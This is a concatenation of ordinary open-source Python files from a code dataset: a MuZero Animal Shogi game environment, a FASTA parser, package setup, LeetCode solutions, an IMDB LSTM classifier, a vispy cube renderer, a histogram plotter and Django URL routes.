AnimalShogi()\n obj.board = numpy.copy(self.board)\n obj.stocks = numpy.copy(self.stocks)\n obj.player = self.player\n obj._legal_actions = copy.copy(self._legal_actions)\n return obj\n\n def init_game(self):\n # Board(H=4, W=3)\n # player-0: L=1, E=2, G=3, P=4, C=5\n # player-1: L=6, E=7, G=8, P=9, C=10\n # stocks for p0 = (E, G, P)\n # stocks for p1 = (E, G, P)\n self.board = numpy.array([\n [G2, L2, E2],\n [0, P2, 0],\n [0, P1, 0],\n [E1, L1, G1],\n ], dtype=\"int32\")\n self.stocks = numpy.zeros((2, CAPTURABLE_KIND_NUM), dtype=\"int32\")\n self.player = 0\n self._legal_actions = None\n\n def reset(self):\n self.init_game()\n return self.get_observation()\n\n def to_play(self):\n return self.player\n\n def step(self, action):\n move = Move.decode_from_action_index(action)\n if not self.is_legal(move):\n return self.get_observation(), -1, True\n win, lose, done = self.do_move(move)\n self.player = 1 - self.player\n reward = 0\n if win:\n reward = 1\n elif lose:\n reward = -1\n return self.get_observation(), reward, done\n\n def do_move(self, move: Move):\n self._legal_actions = None\n player = self.to_play()\n win = False\n lose = False\n done = False\n if move.from_stock is not None: # drop\n self.stocks[player][move.from_stock] -= 1\n unit_kind = move.from_stock + 2 + player * 5 # (2,3,4 or 7,8,9)\n self.board[move.to_pos()] = unit_kind\n else:\n unit_kind = self.board[move.from_pos()]\n self.board[move.from_pos()] = 0\n if self.board[move.to_pos()] > 0: # capture\n captured_unit_kind = self.board[move.to_pos()] % 5\n if captured_unit_kind == 1: # Lion\n done = win = True\n else:\n # board:E, G, P, C -> stock:E, G, P, P\n stock_kind = [2, None, 0, 1, 2][captured_unit_kind]\n self.stocks[player][stock_kind] += 1\n self.board[move.to_pos()] = unit_kind + move.promotion\n # Player1 Lion Try!\n if player == 0 and numpy.any(self.board[BOARD_SIZE_Y-1] == L2):\n lose = done = True\n # Player0 Lion Try!\n elif player == 1 and numpy.any(self.board[0] == L1):\n lose = done = True\n return win, lose, done\n\n @staticmethod\n def is_legal_move_direction(unit_kind, from_pos, to_pos):\n diff = (to_pos[0]-from_pos[0], to_pos[1]-from_pos[1])\n return diff in ALLOWED_MOVES[unit_kind]\n\n def is_legal(self, move: Move):\n player = self.to_play()\n if move.from_stock is not None:\n remain_num = self.stocks[self.to_play()][move.from_stock]\n if remain_num < 1:\n return False\n if move.promotion == 1:\n return False\n else:\n unit_kind = self.board[move.from_pos()]\n if unit_kind == 0: # no unit there\n return False\n elif unit_kind < 6 and self.to_play() == 1: # opponent unit\n return False\n elif unit_kind > 5 and self.to_play() == 0: # opponent unit\n return False\n if move.promotion == 1:\n if player == 0 and (unit_kind != P1 or move.to_pos()[0] != 0):\n return False\n elif player == 1 and (unit_kind != P2 or move.to_pos()[0] != BOARD_SIZE_Y-1):\n return False\n if not self.is_legal_move_direction(unit_kind, move.from_pos(), move.to_pos()):\n return False\n\n captured = self.board[move.to_pos()]\n if captured:\n if move.from_stock is not None:\n return False # drop on the unit directly\n if captured < 6 and self.to_play() == 0: # capture my team0\n return False\n if captured > 5 and self.to_play() == 1: # capture my team1\n return False\n return True\n\n def get_observation(self):\n channels = []\n # board\n for kind in range(1, 11):\n ch = numpy.where(self.board == kind, 1, 0)\n channels.append(ch)\n # stock\n for player in [0, 1]:\n for kind in range(CAPTURABLE_KIND_NUM):\n ch = numpy.full_like(\n channels[0], self.stocks[player][kind] / 2.)\n channels.append(ch)\n # to_play\n ch = numpy.full_like(channels[0], 1 - self.to_play() * 2)\n channels.append(ch)\n return numpy.array(channels, dtype=\"int32\")\n\n def legal_actions(self):\n if self._legal_actions is None:\n ret = []\n for action in range(ACTION_SPACE_SIZE):\n if self.is_legal(Move.decode_from_action_index(action)):\n ret.append(action)\n self._legal_actions = ret\n return copy.copy(self._legal_actions)\n\n def human_to_action(self):\n stock_kinds = {\"E\": 0, \"G\": 1, \"C\": 2}\n if self.to_play() == 0:\n print(P1_COLOR + f\"Player1\" + RESET)\n else:\n print(P2_COLOR + f\"Player2\" + RESET)\n\n def convert_position_string_to_pos_index(pos_str):\n try:\n pos_str = pos_str.lower()\n col = int(pos_str[0]) - 1\n row = \"abcd\".index(pos_str[1])\n return row * BOARD_SIZE_X + col\n except:\n return None\n\n # input from\n from_stock = None\n from_board = None\n to_board = None\n player = self.to_play()\n while True:\n while True:\n try:\n from_str = input(\n f\"From(ex: '1a', '2d', or 'E' 'G' 'C' from stock): \").strip()\n if from_str == \"random\":\n return numpy.random.choice(self.legal_actions())\n if from_str.upper() in stock_kinds:\n from_stock = stock_kinds[from_str.upper()]\n if self.stocks[player][from_stock] > 0:\n break\n else:\n print(f\"You do not have {from_str}\")\n elif len(from_str) == 2:\n from_board = convert_position_string_to_pos_index(\n from_str)\n if from_board is None:\n print(f\"illegal position {from_str}\")\n else:\n break\n except:\n pass\n print(\"Wrong input, try again\")\n\n while True:\n try:\n to_str = input(f\"To(ex: '1a', '2d'): \").strip()\n if to_str == \"random\":\n return numpy.random.choice(self.legal_actions())\n if len(to_str) == 2:\n to_board = convert_position_string_to_pos_index(to_str)\n if to_str is None:\n print(f\"illegal position {from_str}\")\n else:\n break\n except:\n pass\n print(\"Wrong input, try again\")\n\n move = Move(from_board, from_stock, to_board, 0)\n if self.is_legal(move) and move.from_board is not None:\n m2 = move.clone()\n m2.promotion = 1\n if self.is_legal(m2):\n pr_str = input(\"Promotion? [Y]/[n]: \").lower()\n if pr_str != \"n\":\n move.promotion = 1\n if self.is_legal(move):\n break\n else:\n print(\"Illegal Move, try again\")\n return move.encode_to_action_index()\n\n def expert_action(self):\n best_actions, _ = self.search_moves(self.clone(), 2, self.to_play())\n return numpy.random.choice(best_actions)\n\n def search_moves(self, state, search_depth: int, for_player: int):\n \"\"\"\n :param AnimalShogi state:\n :param search_depth:\n :param for_player:\n :return:\n \"\"\"\n action_results = {}\n\n for action in state.legal_actions():\n s = state.clone()\n _, reward, done = s.step(action)\n if done or search_depth == 0:\n action_results[action] = reward\n else:\n _, best_reward = self.search_moves(\n s, search_depth-1, for_player)\n action_results[action] = -best_reward * 0.99\n\n best_reward = numpy.max(list(action_results.values()))\n best_actions = [a for a, r in action_results.items()\n if r == best_reward]\n return best_actions, best_reward\n\n def render(self):\n chars = {\n 0: \" \",\n L1: P1_COLOR + \"🐯\" + RESET,\n E1: P1_COLOR + \"🐘\" + RESET,\n G1: P1_COLOR + \"🐴\" + RESET,\n P1: P1_COLOR + \"🐥\" + RESET,\n C1: P1_COLOR + \"🐔\" + RESET,\n L2: P2_COLOR + \"🐯\" + RESET,\n E2: P2_COLOR + \"🐘\" + RESET,\n G2: P2_COLOR + \"🐴\" + RESET,\n P2: P2_COLOR + \"🐥\" + RESET,\n C2: P2_COLOR + \"🐔\" + RESET,\n }\n lines = []\n for line in self.board:\n line_ch_list = []\n for kind in line:\n line_ch_list.append(chars[kind])\n lines.append(\"\".join(line_ch_list))\n\n stock_lines = []\n for stocks in self.stocks:\n stock = \"\"\n for i, num in enumerate(stocks):\n stock += \"🐘🐴🐥\"[i] * num\n stock_lines.append(stock)\n\n print(P2_COLOR + f\"stock: {stock_lines[1]}\" + RESET)\n print(\" | 1 2 3|\")\n print(\"-+------+-\")\n print(\"\\n\".join([f\"{m}|{line}|\" for m, line in zip(\"abcd\", lines)]))\n print(\"-+------+-\")\n print(P1_COLOR + f\"stock: {stock_lines[0]}\" + RESET)\n\n def action_to_string(self, action_number):\n move = Move.decode_from_action_index(action_number)\n if move.from_board is not None:\n from_pos, to_pos = move.from_pos(), move.to_pos()\n kind = self.board[to_pos]\n if kind == 0:\n ch = \" \"\n else:\n ch = \"🐯🐘🐴🐥🐔\"[(kind-1) % 5]\n pos_from = \"123\"[from_pos[1]] + \"abcd\"[from_pos[0]]\n pos_to = \"123\"[to_pos[1]] + \"abcd\"[to_pos[0]]\n return f\"{pos_from}{pos_to}{ch}\"\n else:\n to_pos = move.to_pos()\n pos_to = \"123\"[to_pos[1]] + \"abcd\"[to_pos[0]]\n ch = \"🐘🐴🐥\"[move.from_stock]\n return f\"->{pos_to}{ch}\"\n\n\n# first player\nL1 = 1 # Lion\nE1 = 2 # Elephant\nG1 = 3 # Giraph\nP1 = 4 # Chick (Piyo Piyo! or Pawn)\nC1 = 5 # Chicken\n\n# second player\nL2 = 6\nE2 = 7\nG2 = 8\nP2 = 9\nC2 = 10\n\n# move direction\nUL = (-1, -1) # Y, X\nUU = (-1, 0)\nUR = (-1, 1)\nML = (0, -1)\nMR = (0, 1)\nDL = (1, -1)\nDD = (1, 0)\nDR = (1, 1)\n\nALLOWED_MOVES = {\n L1: [UL, UU, UR, ML, MR, DL, DD, DR],\n L2: [UL, UU, UR, ML, MR, DL, DD, DR],\n E1: [UL, UR, DL, DR],\n E2: [UL, UR, DL, DR],\n G1: [UU, ML, MR, DD],\n G2: [UU, ML, MR, DD],\n P1: [UU],\n P2: [DD],\n C1: [UL, UU, UR, ML, MR, DD],\n C2: [DL, DD, DR, ML, MR, UU],\n}\n\n\nclass AnimalShogiNetwork(MuZeroResidualNetwork):\n def get_action_channel_size(self):\n return 6\n\n def encode_hidden_and_action(self, encoded_state, action):\n \"\"\"\n\n :param encoded_state: [batch, ch, Height, Width]\n :param action: [batch, 1]\n :return:\n \"\"\"\n channels = self.encode_action(encoded_state.shape, action)\n return torch.cat([encoded_state] + channels, dim=1)\n\n @staticmethod\n def encode_action(shape, action):\n \"\"\"\n\n :param shape: tuple(batch, ch, h, w)\n :param action: [batch, 1]\n\n >>> sh = (2, 8, 4, 3)\n >>> moves = [Move(5, None, 0, 1), Move(None, 1, 11, 0)]\n >>> action = torch.tensor([[m.encode_to_action_index()] for m in moves])\n >>> channels = torch.cat(AnimalShogiNetwork.encode_action(sh, action), dim=1)\n >>> channels.shape\n torch.Size([2, 6, 4, 3])\n >>> assert channels[0, 0, 1, 2] == 1. # From\n >>> assert torch.sum(channels[0, 0, :, :]) == 1\n >>> assert torch.sum(channels[0, 1:4, :, :]) == 0 # Stocks\n >>> assert channels[0, 4, 0, 0] == 1 # To\n >>> assert torch.sum(channels[0, 4, :, :]) == 1 # To\n >>> assert torch.sum(channels[0, 5, :, :]) == 12 # Promotion\n >>> #\n >>> assert torch.sum(channels[1, 0, :, :]) == 0 # From Board\n >>> assert torch.sum(channels[1, 1, :, :]) == 0 # Stock\n >>> assert torch.sum(channels[1, 2, :, :]) == 12\n >>> assert torch.sum(channels[1, 3, :, :]) == 0\n >>> assert channels[1, 4, 3, 2] == 1 # To\n >>> assert torch.sum(channels[1, 4, :, :]) == 1\n >>> assert torch.sum(channels[1, 5, :, :]) == 0 # Promotion\n \"\"\"\n def ones(i):\n sh = shape[0], i, shape[2], shape[3]\n return torch.ones(sh).to(action.device).float()\n\n def zeros(i):\n sh = shape[0], i, shape[2], shape[3]\n return torch.zeros(sh).to(action.device).float()\n\n board_size = BOARD_SIZE_Y * BOARD_SIZE_X\n promote = action % 2\n action //= 2\n to_board = (action % board_size).long().squeeze(1)\n action //= board_size\n minus_1 = torch.tensor(-1).to(action.device)\n from_board = torch.where(\n action < board_size, action.long(), minus_1).long().squeeze(1)\n from_stock = torch.where(\n action < board_size, minus_1, (action-board_size).long()).long().squeeze(1)\n\n channels = []\n indexes = torch.arange(len(action)).long()\n # From\n from_ch = zeros(1)\n from_ch[indexes, :, from_board // BOARD_SIZE_X, from_board % BOARD_SIZE_X] = (\n torch.where(from_board >= 0., torch.Tensor(\n [1.]), torch.Tensor([0.]))[:, None].float()\n )\n channels.append(from_ch)\n # Stock\n stocks = zeros(CAPTURABLE_KIND_NUM)\n stocks[indexes, from_stock, :, :] = torch.where(\n from_stock >= 0., torch.Tensor(\n [1.]), torch.Tensor([0.]))[:, None, None].float()\n channels.append(stocks)\n # To\n to_ch = zeros(1)\n to_ch[indexes, :, to_board // BOARD_SIZE_X,\n to_board % BOARD_SIZE_X] = 1.\n channels.append(to_ch)\n # promote\n channels.append(ones(1) * promote[:, :, None, None])\n return channels\n\n\nif __name__ == \"__main__\":\n game = Game()\n game.reset()\n while True:\n game.render()\n action = game.expert_agent()\n _, r, done = game.step(action)\n print(f\"Player{game.to_play()}: {game.action_to_string(action)}\")\n if done:\n print(f\"reward: {r}, done\")\n break\n","sub_path":"muzero/games/animal_shogi.py","file_name":"animal_shogi.py","file_ext":"py","file_size_in_byte":28027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"585639148","text":"import os\nimport re\nimport matplotlib.pyplot as plt\n\n\n\nclass FastaParser(object):\n \"\"\" Fasta parser that take path/to/fastafile as input \"\"\"\n def __init__(self, in_path):\n \"\"\" Check input and parse information in fasta file\"\"\"\n \n if not os.path.exists(in_path):\n raise IOError(\"No such file...\")\n \n self.in_path = open(in_path)\n self.fasta = re.split(\"^>\", self.in_path.read(), flags=re.MULTILINE)\n self.entries = []\n for entry in self.fasta[1:]:\n header, seq = entry.split(\"\\n\", 1)\n self.entries.append([header, seq.replace(\"\\n\", \"\")])\n self.count = len(self.entries)\n \n def __len__(self):\n \"\"\"return nr of entries\"\"\"\n return len(self.entries)\n \n def __getitem__(self, index):\n \"\"\"Makes entries avilable by both index and key\"\"\"\n if type(index) == int:\n return self.entries[index][index]\n else:\n key = \"\"\n for entry in self.entries:\n if entry[0] == index:\n key = entry[1]\n if key:\n return key\n else:\n raise KeyError(\"no such entry\")\n \n def extract_length(self,length):\n \"\"\" Takes int as argument and returns all entries where len(seq) < int\"\"\"\n try:\n int(length)\n except:\n raise TypeError(\"Needed a number\")\n filter = []\n for entry in self.entries:\n if len(entry[1]) < length:\n filter.append(entry)\n return filter\n \n def length_dist(self, out_path):\n \"\"\"Takes a path as argument and create a pdf at that part with a length\n distribution of the entries\"\"\"\n new_path = out_path.replace(\"~\", os.environ[\"HOME\"])\n \n if not os.path.exists(new_path[:new_path.rfind(\"/\")]): \n os.mkdir(new_path[:new_path.rfind(\"/\")+1])\n \n lens = {}\n for entry in self.entries:\n entry_len = len(entry[1])\n if entry_len in lens:\n lens[entry_len] += 1\n else:\n lens[entry_len] = 1\n \n plt.bar([key for key in lens], [lens[key] for key in lens])\n plt.savefig(new_path, facecolor='w', frameon = False)\n return","sub_path":"Day5/fasta_parser.py","file_name":"fasta_parser.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"226092560","text":"from setuptools import setup, find_packages \n \nwith open('requirements.txt') as f: \n requirements = f.readlines() \n \nlong_description = 'Given a vcf file, produces a tidy versions of sites and genotypes data, in \\\n efforts to make it easier to calculate summary statitics and visualizations.' \n \nsetup( \n name ='tidy_vcf', \n version ='0.1.2.3', \n author ='Silas Tittes', \n author_email ='silas.tittes@gmail.com', \n url ='https://github.com/silastittes/tidy_vcf', \n description ='Make tidy VCF data.', \n long_description = long_description, \n long_description_content_type =\"text/markdown\", \n license ='MIT', \n packages = find_packages(), \n entry_points ={ \n 'console_scripts': [ \n 'tidy_vcf = tidy_vcf.tidy_vcf:main'\n ] \n }, \n classifiers =( \n \"Programming Language :: Python :: 3\", \n \"License :: OSI Approved :: MIT License\", \n \"Operating System :: OS Independent\", \n ), \n keywords ='VCF genetics python package', \n install_requires = requirements, \n zip_safe = False,\n python_requires='>=3.6'\n) \n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"436351933","text":"\n# @Title: 两两交换链表中的节点 (Swap Nodes in Pairs)\n# @Author: allan.wanglz@qq.com\n# @Date: 2020-06-18 22:24:18\n# @Runtime: 44 ms\n# @Memory: 13.7 MB\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def swapPairs(self, head: ListNode) -> ListNode:\n if not head or not head.next:\n return head\n before_head = ListNode(next=head)\n pt = before_head\n while pt.next and pt.next.next:\n self.swapAdj(pt, pt.next, pt.next.next.next)\n pt = pt.next.next\n return before_head.next\n \n @staticmethod\n def swapAdj(left, start, right):\n end = start.next\n left.next = end\n start.next = right\n end.next = start\n","sub_path":"Problemset/swap-nodes-in-pairs/swap-nodes-in-pairs.py","file_name":"swap-nodes-in-pairs.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"205319175","text":"import nltk\nfrom nltk import word_tokenize\nfrom nltk.util import ngrams\n\nimport numpy\nimport random\nimport tensorflow as tf\nfrom keras.preprocessing import sequence\n\nnumpy.random.seed(7)\ntf.set_random_seed(7)\n\nfrom keras.datasets import imdb\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Activation\nfrom keras.layers import Embedding\n\n# Just to ensure\nnumpy.random.seed(7)\ntf.set_random_seed(7)\n\n\ndef convert_to_trigrams(in_set, out_set):\n new_in = []\n new_out = []\n for x, y in zip(in_set, out_set):\n tg = list(ngrams(x, 3))\n nx = []\n for t in tg:\n if t in tg_dict:\n nx.append(tg_dict[t])\n if len(nx) > 0:\n new_in.append(nx)\n new_out.append(int(y))\n return new_in, new_out\n\ndef convert_to_trigrams_and_bigrams(in_set, out_set):\n new_in = []\n new_out = []\n for x, y in zip(in_set, out_set):\n tg = list(ngrams(x, 3))\n tg.extend(list(ngrams(x, 2)))\n nx = []\n for t in tg:\n if t in tg_dict:\n nx.append(tg_dict[t])\n if len(nx) > 0:\n new_in.append(nx)\n new_out.append(int(y))\n return new_in, new_out\n\n\ndef fitLength(arr, m_length):\n for i in range(len(arr)):\n l = len(arr[i]) - 1\n while len(arr[i]) < m_length:\n arr[i].append(arr[i][random.randint(0, l)]) # different elements can be used to increase length\n if len(arr[i]) > m_length:\n arr[i] = arr[i][:m_length] # here some different methods can be applied (sorting, etc.)\n\n\nprint(\"Loading IMDB data...\")\nmax_features = 1000\n(X_train, y_train), (X_test, y_test) = imdb.load_data(seed=113)\nprint(\"IMDB data loaded.\")\n\nprint(\"Creating trigrams bow...\")\ntrigrams_bow = []\nfor x in X_train:\n trigrams_bow.extend(list(ngrams(x, 3)))\n\nprint(\"Creating bigrams bow...\")\nbigrams_bow = []\nfor x in X_train:\n bigrams_bow.extend(list(ngrams(x, 2)))\n\nprint(\"Creating trigram bow finished.\")\nprint(\"Calculating frequency distribution for trigrams...\")\nfdist_tri = nltk.FreqDist(trigrams_bow)\nlen(fdist_tri)\n\nprint(\"Calculating frequency distribution for bigrams...\")\nfdist_bi = nltk.FreqDist(bigrams_bow)\nlen(fdist_bi)\n\nprint(\"Creating trigrams dictionary...\")\ntg_dict = {}\ndict_size = 500\ncount = 0\nfor tg, freq in fdist_tri.most_common(dict_size):\n tg_dict[tg] = count\n count += 1\n\nfor tg, freq in fdist_bi.most_common(dict_size):\n tg_dict[tg] = count\n count += 1\n\nprint(\"Dictionary created.\")\n\nprint(\"Converting IMDB data to trigrams...\")\nx_train_tg, y_train_tg = convert_to_trigrams_and_bigrams(X_train, y_train)\nx_test_tg, y_test_tg = convert_to_trigrams_and_bigrams(X_test, y_test)\nprint(\"IMDB converted.\")\n\nprint(\"Reviews length distribution:\")\nimport matplotlib.pyplot as plt\n\nreview_length = []\nfor x in range(0, len(x_train_tg)):\n review_length.append(len(x_train_tg[x]))\n\nplt.figure(1)\nplt.plot(review_length)\n\nplt.figure(2)\nplt.plot(review_length)\nplt.axis([0, 5000, 0, 200])\n\nplt.show()\n\nmax_review_length = 300\nprint(\"Matching reviews length to \", max_review_length, \"...\")\n# x_train_tg = sequence.pad_sequences(x_train_tg, maxlen = max_review_length, value=x_train_tg[0][0])\n# x_test_tg = sequence.pad_sequences(x_test_tg, maxlen = max_review_length, value=x_test_tg[0][0])\n\nfitLength(x_train_tg, max_review_length)\nfitLength(x_test_tg, max_review_length)\nprint(\"Matching finished.\")\n\nprint(\"Creating model...\")\nmodel = Sequential()\nembedding_vector_length = 32\nlstm_output_space = 50 # parameter to change\nmodel.add(Embedding(max_features, embedding_vector_length, input_length=max_review_length))\nmodel.add(LSTM(lstm_output_space, dropout_W=0.2, dropout_U=0.2))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\nprint(\"Compiling model...\")\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\nprint(model.summary())\n\nprint(\"Fitting model...\")\nhistory = model.fit(x_train_tg, y_train_tg, epochs=15, batch_size=32)\n\nprint(\"Calculating model accuracy...\")\nmodel_score = model.evaluate(x_test_tg, y_test_tg, verbose=0)\nprint(\"Accuracy: %.2f%%\" % (model_score[1] * 100))","sub_path":"trigrams.py","file_name":"trigrams.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"485586269","text":"\nfrom os import path\nimport numpy as np\nfrom vispy import app, gloo\nfrom vispy.util.transforms import perspective, translate, rotate\nfrom vispy.io import load_data_file, read_mesh, load_crate\n\nVERT_COLOR_CODE = \"\"\"\n// Uniforms\n// ------------------------------------\nuniform mat4 u_model;\nuniform mat4 u_view;\nuniform mat4 u_projection;\nuniform vec4 u_color;\n\n// Attributes\n// ------------------------------------\nattribute vec3 a_position;\nattribute vec4 a_color;\nattribute vec3 a_normal;\n\n// Varying\n// ------------------------------------\nvarying vec4 v_color;\n\nvoid main()\n{\n v_color = u_color;\n gl_Position = u_projection * u_view * u_model * vec4(a_position,1.0);\n}\n\"\"\"\n\n\nFRAG_COLOR_CODE = \"\"\"\n// Varying\n// ------------------------------------\nvarying vec4 v_color;\n\nvoid main()\n{\n gl_FragColor = v_color;\n}\n\"\"\"\n\nVERT_TEX_CODE = \"\"\"\nuniform mat4 u_model;\nuniform mat4 u_view;\nuniform mat4 u_projection;\n\nattribute vec3 a_position;\nattribute vec2 a_texcoord;\n\nvarying vec2 v_texcoord;\n\nvoid main()\n{\n v_texcoord = a_texcoord;\n gl_Position = u_projection * u_view * u_model * vec4(a_position,1.0);\n}\n\"\"\"\n\n\nFRAG_TEX_CODE = \"\"\"\nuniform sampler2D u_texture;\nvarying vec2 v_texcoord;\n\nvoid main()\n{\n float ty = v_texcoord.y;\n float tx = sin(ty*50.0)*0.01 + v_texcoord.x;\n gl_FragColor = texture2D(u_texture, vec2(tx, ty));\n}\n\"\"\"\n\n\n\nclass Canvas(app.Canvas):\n\n def __init__(self):\n app.Canvas.__init__(self, keys='interactive', size=(800, 600))\n\n dirname = path.join(path.abspath(path.curdir),'data')\n positions, faces, normals, texcoords = \\\n read_mesh(load_data_file('cube.obj', directory=dirname))\n\n self.filled_buf = gloo.IndexBuffer(faces)\n\n if False:\n self.program = gloo.Program(VERT_TEX_CODE, FRAG_TEX_CODE)\n self.program['a_position'] = gloo.VertexBuffer(positions)\n self.program['a_texcoord'] = gloo.VertexBuffer(texcoords)\n self.program['u_texture'] = gloo.Texture2D(load_crate())\n else:\n self.program = gloo.Program(VERT_COLOR_CODE, FRAG_COLOR_CODE)\n self.program['a_position'] = gloo.VertexBuffer(positions)\n self.program['u_color'] = 1, 0, 0, 1\n\n self.view = translate((0, 0, -5))\n self.model = np.eye(4, dtype=np.float32)\n\n gloo.set_viewport(0, 0, self.physical_size[0], self.physical_size[1])\n self.projection = perspective(45.0, self.size[0] /\n float(self.size[1]), 2.0, 10.0)\n\n self.program['u_projection'] = self.projection\n\n self.program['u_model'] = self.model\n self.program['u_view'] = self.view\n\n self.theta = 0\n self.phi = 0\n\n gloo.set_clear_color('gray')\n gloo.set_state('opaque')\n gloo.set_polygon_offset(1, 1)\n\n self._timer = app.Timer('auto', connect=self.on_timer, start=True)\n\n self.show()\n\n # ---------------------------------\n def on_timer(self, event):\n self.theta += .5\n self.phi += .5\n self.model = np.dot(rotate(self.theta, (0, 1, 0)),\n rotate(self.phi, (0, 0, 1)))\n self.program['u_model'] = self.model\n self.update()\n\n # ---------------------------------\n def on_resize(self, event):\n gloo.set_viewport(0, 0, event.physical_size[0], event.physical_size[1])\n self.projection = perspective(45.0, event.size[0] /\n float(event.size[1]), 2.0, 10.0)\n self.program['u_projection'] = self.projection\n\n # ---------------------------------\n def on_draw(self, event):\n gloo.clear()\n\n # Filled cube\n\n gloo.set_state(blend=False, depth_test=True, polygon_offset_fill=True)\n self.program.draw('triangles', self.filled_buf)\n\n\n# -----------------------------------------------------------------------------\nif __name__ == '__main__':\n c = Canvas()\n app.run()\n","sub_path":"examples/scratch/objloader.py","file_name":"objloader.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"474618529","text":"import logging\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\n\n\nlog = logging.getLogger(__name__)\n\n\ndef _total_yield_uncertainty(sumw2_list):\n \"\"\"calculate the absolute statistical uncertainty of a stack of MC\n via sum in quadrature\n\n Args:\n sumw2_list (list): list of absolute stat. uncertainty per sample\n\n Returns:\n np.array: absolute stat. uncertainty of stack of samples\n \"\"\"\n tot_unc = np.sqrt(np.sum(np.power(sumw2_list, 2), axis=0))\n return tot_unc\n\n\ndef data_MC_matplotlib(histogram_dict_list, figure_path):\n \"\"\"draw a data/MC histogram with matplotlib\n\n Args:\n histogram_dict_list (list[dict]): list of samples (with info stored in one dict per sample)\n figure_path (pathlib.Path): path where figure should be saved\n \"\"\"\n mc_histograms_yields = []\n mc_histograms_sumw2 = []\n mc_labels = []\n for h in histogram_dict_list:\n if h[\"isData\"]:\n data_histogram_yields = h[\"hist\"][\"yields\"]\n data_histogram_sumw2 = h[\"hist\"][\"sumw2\"]\n data_label = h[\"label\"]\n else:\n mc_histograms_yields.append(h[\"hist\"][\"yields\"])\n mc_histograms_sumw2.append(h[\"hist\"][\"sumw2\"])\n mc_labels.append(h[\"label\"])\n\n # get the highest single bin from the sum of MC\n y_max = np.max(\n np.sum(\n [h[\"hist\"][\"yields\"] for h in histogram_dict_list if not h[\"isData\"]],\n axis=0,\n )\n )\n\n # if data is higher in any bin, the maximum y axis range should take that into account\n y_max = max(\n y_max, np.max([h[\"hist\"][\"yields\"] for h in histogram_dict_list if h[\"isData\"]])\n )\n\n mpl.style.use(\"seaborn-colorblind\")\n\n # plot MC stacked together\n total_yield = np.zeros_like(mc_histograms_yields[0])\n bins = histogram_dict_list[0][\"hist\"][\"bins\"]\n bin_right_edges = bins[1:]\n bin_left_edges = bins[:-1]\n bin_width = bin_right_edges - bin_left_edges\n bin_centers = 0.5 * (bin_left_edges + bin_right_edges)\n for i_sample, mc_sample_yield in enumerate(mc_histograms_yields):\n plt.bar(\n bin_centers,\n mc_sample_yield,\n width=bin_width,\n bottom=total_yield,\n label=mc_labels[i_sample],\n )\n total_yield += mc_sample_yield\n\n # add total MC uncertainty\n mc_stack_unc = _total_yield_uncertainty(mc_histograms_sumw2)\n plt.bar(\n bin_centers,\n 2 * mc_stack_unc,\n width=bin_width,\n bottom=total_yield - mc_stack_unc,\n label=\"Stat. uncertainty\",\n fill=False,\n linewidth=0,\n edgecolor=\"gray\",\n hatch=3 * \"/\",\n )\n\n # plot data\n plt.errorbar(\n bin_centers,\n data_histogram_yields,\n yerr=data_histogram_sumw2,\n fmt=\"o\",\n c=\"k\",\n label=data_label,\n )\n\n plt.legend(frameon=False)\n plt.xlabel(histogram_dict_list[0][\"variable\"])\n plt.ylabel(\"events\")\n plt.xlim(bin_left_edges[0], bin_right_edges[-1])\n plt.ylim([0, y_max * 1.1]) # 10% headroom\n plt.plot()\n\n if not os.path.exists(figure_path.parent):\n os.mkdir(figure_path.parent)\n log.debug(\"saving figure as %s\", figure_path)\n plt.savefig(figure_path)\n plt.clf()\n","sub_path":"src/cabinetry/contrib/histogram_drawing.py","file_name":"histogram_drawing.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"75195386","text":"from django.conf.urls import url, include\n\nurlpatterns = [\n url(r'^$', 'blog.views.home', name='home'),\n url(r'^archive/$', 'blog.views.archive', name='archive'),\n url(r'^view/(?P[^\\.]+).html$', 'blog.views.post', name='post'),\n url(r'^search/', include('haystack.urls')),\n url(r'^login/$', 'blog.views.login', name='login'),\n url(r'^logout/$', 'blog.views.logout', name='logout'),\n url(r'^edit/(?P[^\\.]+).html$', 'blog.views.edit', name='edit'),\n url(r'^save/$', 'blog.views.save', name='save'),\n url(r'^delete/(?P[^\\.]+).html$', 'blog.views.delete', name='delete'),\n url(r'^toggle_publish/(?P[^\\.]+).html$', 'blog.views.toggle_publish', name='toggle_publish'),\n url(r'^create/$', 'blog.views.create', name='create'),\n url(r'^manage/$', 'blog.views.manage', name='manage'),\n]\n","sub_path":"src/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"79690823","text":"class Solution:\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n for i in range(len(nums)):\n num_expect = target - nums[i]\n if num_expect in nums[i + 1:]:\n print([i, nums.index(num_expect, i+1)])\n return [i, nums.index(num_expect, i+1)]\n\n\nSolution().twoSum([3, 5, 4, 1, 4], 9)\n","sub_path":"algorithm/array/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"309429300","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 4 